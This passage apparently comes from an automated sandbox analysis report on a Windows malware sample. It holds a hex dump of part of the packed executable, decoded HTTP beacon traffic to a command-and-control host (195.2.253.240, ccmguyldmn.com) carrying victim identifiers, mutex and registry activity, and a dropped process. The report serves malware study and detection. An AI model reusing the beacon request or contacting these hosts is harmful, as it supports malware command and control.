c87f 4c01 0300 f61d 454a e000 0f01 0b01    ..L.....EJ......
068b 7def ec00 1813 400b 0320 0d0b 6e16    ..}.....@.. ..n.
6c39 0204 3307 0cc0 cedc 92a0 1e34 1007    l9..3........4..
21ba cbde 0600 6c4f 64cf 6617 ae22 2e79    !.....lOd.f..".y
7874 8c78 b7b0 cb03 0423 9a60 2e72 6485    xt.x.....#.`.rd.
7d01 5b4e 61fb 2314 27a4 d966 dd40 022e    }.[Na.#.'..f.@..
2623 7030 cded 291b 1827 c000 90f3 3c21    &#p0..)..'....<!
9100 0000 c000 0000 2001 00ff 0060 be00    ........ ....`..
a040 008d be00 70ff ff57 eb0b 908a 0646    .@....p..W.....F
8807 4701 db75 078b 1e83 eefc 11db 72ed    ..G..u........r.
b801 0000 0001 db75 078b 1e83 eefc 11db    .......u........
11c0 01db 73ef 7509 8b1e 83ee fc11 db73    ....s.u........s
e431 c983 e803 720d c1e0 088a 0646 83f0    .1....r......F..
ff74 7489 c501 db75 078b 1e83 eefc 11db    .tt....u........
11c9 01db 7507 8b1e 83ee fc11 db11 c975    ....u..........u
2041 01db 7507 8b1e 83ee fc11 db11 c901     A..u...........
db73 ef75 098b 1e83 eefc 11db 73e4 83c1    .s.u........s...
0281 fd00 f3ff ff83 d101 8d14 2f83 fdfc    ............/...
760f 8a02 4288 0747 4975 f7e9 63ff ffff    v...B..GIu..c...
908b 0283 c204 8907 83c7 0483 e904 77f1    ..............w.
01cf e94c ffff ff5e 8dbe 0090 0000 8b07    ...L...^........
09c0 743c 8b5f 048d 8430 00b0 0000 01f3    ..t<._...0......
5083 c708 ff96 64b0 0000 958a 0747 08c0    P.....d......G..
74dc 89f9 5748 f2ae 55ff 9668 b000 0009    t...WH..U..h....
c074 0789 0383 c304 ebe1 ff96 78b0 0000    .t..........x...
8bae 6cb0 0000 8dbe 00f0 ffff bb00 1000    ..l.............
0050 546a 0453 57ff d58d 87ff 0100 0080    .PTj.SW.........
207f 8060 287f 5850 5450 5357 ffd5 5861     ..`(.XPTPSW..Xa
8d44 2480 6a00 39c4 75fa 83ec 80e9 2b5b    .D$.j.9.u.....+[
ffff 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0098 c000 0064 c000    .............d..
0000 0000 0000 0000 0000 0000 00a5 c000    ................
0080 c000 0000 0000 0000 0000 0000 0000    ................
00af c000 0088 c000 0000 0000 0000 0000    ................
0000 0000 00ba c000 0090 c000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
00c4 c000 00d2 c000 00e2 c000 00f2 c000    ................
0000 c100 000e c100 0000 0000 001c c100    ................
0000 0000 002c c100 0000 0000 0034 c100    .....,.......4..
0000 0000 004b 4552 4e45 4c33 322e 444c    .....KERNEL32.DL
4c00 6764 6933 322e 646c 6c00 6d73 7663    L.gdi32.dll.msvc
7274 2e64 6c6c 0075 7365 7233 322e 646c    rt.dll.user32.dl
6c00 004c 6f61 644c 6962 7261 7279 4100    l..LoadLibraryA.
0047 6574 5072 6f63 4164 6472 6573 7300    .GetProcAddress.
0056 6972 7475 616c 5072 6f74 6563 7400    .VirtualProtect.
0056 6972 7475 616c 416c 6c6f 6300 0056    .VirtualAlloc..V
6972 7475 616c 4672 6565 0000 0045 7869    irtualFree...Exi
7450 726f 6365 7373 0000 0047 6574 5374    tProcess...GetSt
6f63 6b4f 626a 6563 7400 005f 6578 6974    ockObject.._exit
0000 0053 6574 466f 6375 7300 0000 0000    ...SetFocus.....
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000                                  ....
Data received: 
    
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 00                     .........
from ANUBIS:1041 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 262 - Transferred inbound Bytes: 178
Data sent: 
    
4745 5420 2f70 726f 6773 2f6c 7471 7269    GET /progs/ltqri
766a 2f70 7a6d 776a 6b6f 6f70 702e 7068    vj/pzmwjkoopp.ph
703f 6164 763d 6164 7635 3132 2663 6f64    p?adv=adv512&cod
6531 3d4c 4e4c 4426 636f 6465 323d 3331    e1=LNLD&code2=31
3135 2669 643d 3138 3234 3234 3530 3030    15&id=1824245000
2670 3d31 2048 5454 502f 312e 310d 0a55    &p=1 HTTP/1.1..U
7365 722d 4167 656e 743a 204d 6f7a 696c    ser-Agent: Mozil
6c61 2f34 2e30 2028 636f 6d70 6174 6962    la/4.0 (compatib
6c65 3b20 4d53 4945 2037 2e30 3b20 5769    le; MSIE 7.0; Wi
6e64 6f77 7320 4e54 2035 2e31 3b20 2e4e    ndows NT 5.1; .N
4554 2043 4c52 2031 2e31 2e34 3332 323b    ET CLR 1.1.4322;
202e 4e45 5420 434c 5220 322e 302e 3530     .NET CLR 2.0.50
3732 373b 202e 4e45 5420 434c 5220 332e    727; .NET CLR 3.
302e 3034 3530 362e 3330 3b20 496e 666f    0.04506.30; Info
5061 7468 2e31 2976 6572 3334 0d0a 486f    Path.1)ver34..Ho
7374 3a20 6363 6d67 7579 6c64 6d6e 2e63    st: ccmguyldmn.c
6f6d 0d0a 0d0a                             om....
Data received: 
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2057 6564 2c20 3031 204a    .Date: Wed, 01 J
756c 2032 3030 3920 3135 3a35 363a 3135    ul 2009 15:56:15
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2846 6564    ache/2.2.11 (Fed
6f72 6129 0d0a 582d 506f 7765 7265 642d    ora)..X-Powered-
4279 3a20 5048 502f 352e 322e 390d 0a43    By: PHP/5.2.9..C
6f6e 7465 6e74 2d4c 656e 6774 683a 2032    ontent-Length: 2
0d0a 436f 6e6e 6563 7469 6f6e 3a20 636c    ..Connection: cl
6f73 650d 0a43 6f6e 7465 6e74 2d54 7970    ose..Content-Typ
653a 2074 6578 742f 6874 6d6c 0d0a 0d0a    e: text/html....
6f6b                                       ok

  -  TCP Connection Attempts:  
from ANUBIS:1036 to 195.2.253.240:80
from ANUBIS:1037 to 195.2.253.240:80
from ANUBIS:1034 to 195.2.253.240:80
from ANUBIS:1038 to 195.2.253.240:80
from ANUBIS:1041 to 195.2.253.240:80
from ANUBIS:1033 to 195.2.253.240:80
from ANUBIS:1039 to 195.2.253.240:80
from ANUBIS:1035 to 195.2.253.240:80

2.f) sample.exe - Other Activities

  - Mutexes Created:  
CTF.Asm.MutexDefaultS-​1-​5-​21-​1229272821-​1004336348-​527237240-​1003
CTF.Compart.MutexDefaultS-​1-​5-​21-​1229272821-​1004336348-​527237240-​1003
CTF.LBES.MutexDefaultS-​1-​5-​21-​1229272821-​1004336348-​527237240-​1003
CTF.Layouts.MutexDefaultS-​1-​5-​21-​1229272821-​1004336348-​527237240-​1003
CTF.TMD.MutexDefaultS-​1-​5-​21-​1229272821-​1004336348-​527237240-​1003
CTF.TimListCache.FMPDefaultS-​1-​5-​21-​1229272821-​1004336348-​527237240-​1003MUTEX.DefaultS-​1-​5-​21-​1229272821-​1004336348-​527237240-​1003
DDrawDriverObjectListMutex
DDrawWindowListMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesCounterMutex
Local\ZonesLockedCacheCounterMutex
__DDrawCheckExclMode__
__DDrawExclMode__

  - Windows SEH exceptions:  
Description Times
Exception 0x80000003 (STATUS_BREAKPOINT) at 0x40ba5d 

3. services.exe

  - General information about this executable  
Analysis Reason: NtConnectPort(\RPC Control\ntsvcs was called. 
Filename: services.exe 
MD5: 0e776ed5f7cc9f94299e70461b7b8185 
SHA-1: cb5a33cec4c7b8ef4bd5dc8c241005b66b26cbbf 
File Size: 108544 Bytes
Command Line: C:\WINDOWS\system32\services.exe 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​NCObjAPI.DLL  0x5F770000  0x0000C000 
C:\​WINDOWS\​system32\​MSVCP60.dll  0x76080000  0x00065000 
C:\​WINDOWS\​system32\​SCESRV.dll  0x7DBD0000  0x00051000 
C:\​WINDOWS\​system32\​AUTHZ.dll  0x776C0000  0x00012000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​USERENV.dll  0x769C0000  0x000B4000 
C:\​WINDOWS\​system32\​umpnpmgr.dll  0x7DBA0000  0x00021000 
C:\​WINDOWS\​system32\​WINSTA.dll  0x76360000  0x00010000 
C:\​WINDOWS\​system32\​NETAPI32.dll  0x5B860000  0x00055000 
C:\​WINDOWS\​system32\​ShimEng.dll  0x5CB70000  0x00026000 
C:\​WINDOWS\​AppPatch\​AcAdProc.dll  0x47260000  0x0000F000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​VERSION.dll  0x77C00000  0x00008000 
C:\​WINDOWS\​system32\​eventlog.dll  0x77B70000  0x00011000 
C:\​WINDOWS\​system32\​PSAPI.DLL  0x76BF0000  0x0000B000 
C:\​WINDOWS\​system32\​WS2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​wtsapi32.dll  0x76F50000  0x00008000 

3.a) services.exe - Registry Activities

  - Registry Keys Created:  
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_TAPISRV\​0000\​Control
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_RASMAN\​0000\​Control

  - Registry Values Modified:  
Key Name New Value
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_RASMAN\​0000\​Control  ActiveService  RasMan 
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_TAPISRV\​0000\​Control  ActiveService  TapiSrv 

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0303\​4&2C5A7332&0  ClassGUID  {4D36E96B-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0400\​4&2C5A7332&0  ClassGUID  {4D36E978-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0501\​1  ClassGUID  {4D36E978-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0700\​4&2C5A7332&0  ClassGUID  {4D36E969-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0A03\​1  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0F13\​4&2C5A7332&0  ClassGUID  {4D36E96F-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI_HAL\​PNP0C08\​0  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​DISPLAY\​DEFAULT_MONITOR\​4&2946A9FF&0&11223344&00&02  ClassGUID  {4D36E96E-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​IDE\​CDROMQEMU_QEMU_CD-ROM________________________0.9.____\​4D51303030302033202020202020202020202020  ClassGUID  {4D36E965-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​IDE\​DISKQEMU_HARDDISK___________________________0.9.1___\​4D51303030302031202020202020202020202020  ClassGUID  {4D36E967-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ISAPNP\​READDATAPORT\​0  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​LPTENUM\​MICROSOFTRAWPORT\​5&34A37E9F&0&LPT1  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCIIDE\​IDECHANNEL\​4&3DE75EA&0&0  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCIIDE\​IDECHANNEL\​4&3DE75EA&0&1  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_1013&DEV_00B8&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&10  ClassGUID  {4D36E968-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&18  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&18  DeviceDesc  Realtek RTL8029(AS)-based Ethernet Adapter (Generic) 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&18  Driver  {4D36E972-E325-11CE-BFC1-08002BE10318}\​0001 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_8086&DEV_1237&SUBSYS_00000000&REV_02\​3&13C0B0C5&0&00  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_8086&DEV_7000&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&08  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_8086&DEV_7010&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&09  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​ACPI_HAL\​0000  ClassGUID  {4D36E966-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​DMIO\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​FTDISK\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_AFD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_BEEP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_DMBOOT\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_DMLOAD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_FIPS\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_GPC\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_HTTP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_IPNAT\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_IPSEC\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_KSECDD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_MNMDD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_MOUNTMGR\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDISTAPI\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDISUIO\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDIS\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDPROXY\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NETBT\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NULL\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_PARTMGR\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_PARVDM\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_RASACD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_RDPCDD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_TCPIP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_VGASAVE\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_VOLSNAP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_WANARP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMACM  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMDRV  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMMCI  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMVCD  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMVID  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_L2TPMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_NDISWANIP\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_NDISWANIP\​0000  DeviceDesc  WAN Miniport (IP) 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_NDISWANIP\​0000  Driver  {4D36E972-E325-11CE-BFC1-08002BE10318}\​0008 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PPPOEMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PPTPMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PSCHEDMP\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PSCHEDMP\​0001  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PTIMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​RDPDR\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​RDP_KBD\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​RDP_MOU\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​SYSTEM\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​SYSTEM\​0001  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​SYSTEM\​0002  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​STORAGE\​VOLUME\​1&30A96598&0&SIGNATURE95619561OFFSET7E00LENGTH13F291800  ClassGUID  {71A27CDD-812A-11D0-BEC7-08002BE2092F} 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​PlugPlay  PlugPlayServiceType 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RasMan\​Enum  Root\​LEGACY_RASMAN\​0000 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RasMan\​Enum  Count 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RpcSs\​Enum  Root\​LEGACY_RPCSS\​0000 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RpcSs\​Enum  Count 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​TapiSrv\​Enum  Root\​LEGACY_TAPISRV\​0000 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​TapiSrv\​Enum  Count 
HKLM\​System\​CurrentControlSet\​Services\​PlugPlay  ObjectName  LocalSystem 
HKLM\​System\​CurrentControlSet\​Services\​RasMan  ImagePath  %SystemRoot%\​system32\​svchost.exe -k netsvcs 
HKLM\​System\​CurrentControlSet\​Services\​RasMan  ObjectName  LocalSystem 
HKLM\​System\​CurrentControlSet\​Services\​RpcSs  ObjectName  NT Authority\​NetworkService 
HKLM\​System\​CurrentControlSet\​Services\​TapiSrv  ImagePath  %SystemRoot%\​System32\​svchost.exe -k netsvcs 
HKLM\​System\​CurrentControlSet\​Services\​TapiSrv  ObjectName  LocalSystem 

3.b) services.exe - File Activities

  - Files Read:  
C:\ntsvcs, Flags: Named pipe

  - Files Modified:  
C:\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER, Flags: Named pipeinfo
C:\WINDOWS\system32\config\SysEvent.Evtinfo
C:\ntsvcs, Flags: Named pipeinfo

  - File System Control Communication:  
File Control Code Times
C:\net\NtControlPipe4, Flags: Named pipe  0x0011C017 
C:\ntsvcs, Flags: Named pipe  0x0011001C 

3.c) services.exe - Process Activities

  - Thread Overview:  
Time Number of threads
After 227 seconds

4. bwhqnaix.exe

  - General information about this executable  
Analysis Reason: Started by sample.exe 
Filename: bwhqnaix.exe 
Command Line: c:\bwhqnaix.exe 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​gdi32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Normaliz.dll  0x00860000  0x00009000 
C:\​WINDOWS\​system32\​iertutil.dll  0x42990000  0x00045000 
C:\​WINDOWS\​system32\​WININET.dll  0x42C10000  0x000CF000 
C:\​WINDOWS\​system32\​urlmon.dll  0x42CF0000  0x00127000 
C:\​WINDOWS\​system32\​NETAPI32.dll  0x5B860000  0x00055000 
C:\​WINDOWS\​system32\​comctl32.dll  0x5D090000  0x0009A000 
C:\​WINDOWS\​system32\​hnetcfg.dll  0x662B0000  0x00058000 
C:\​WINDOWS\​System32\​mswsock.dll  0x71A50000  0x0003F000 
C:\​WINDOWS\​System32\​wshtcpip.dll  0x71A90000  0x00008000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​ws2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​sensapi.dll  0x722B0000  0x00005000 
C:\​WINDOWS\​system32\​DDRAW.dll  0x73760000  0x0004B000 
C:\​WINDOWS\​system32\​DCIMAN32.dll  0x73BC0000  0x00006000 
C:\​WINDOWS\​system32\​MSCTF.dll  0x74720000  0x0004C000 
C:\​WINDOWS\​system32\​USERENV.dll  0x769C0000  0x000B4000 
C:\​WINDOWS\​system32\​WINMM.dll  0x76B40000  0x0002D000 
C:\​WINDOWS\​system32\​iphlpapi.dll  0x76D60000  0x00019000 
C:\​WINDOWS\​system32\​rtutils.dll  0x76E80000  0x0000E000 
C:\​WINDOWS\​system32\​rasman.dll  0x76E90000  0x00012000 
C:\​WINDOWS\​system32\​TAPI32.dll  0x76EB0000  0x0002F000 
C:\​WINDOWS\​system32\​RASAPI32.dll  0x76EE0000  0x0003C000 
C:\​WINDOWS\​system32\​DNSAPI.dll  0x76F20000  0x00027000 
C:\​WINDOWS\​system32\​rasadhlp.dll  0x76FC0000  0x00006000 
C:\​WINDOWS\​system32\​OLEAUT32.dll  0x77120000  0x0008B000 
C:\​WINDOWS\​WinSxS\​x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\​comctl32.dll  0x773D0000  0x00103000 
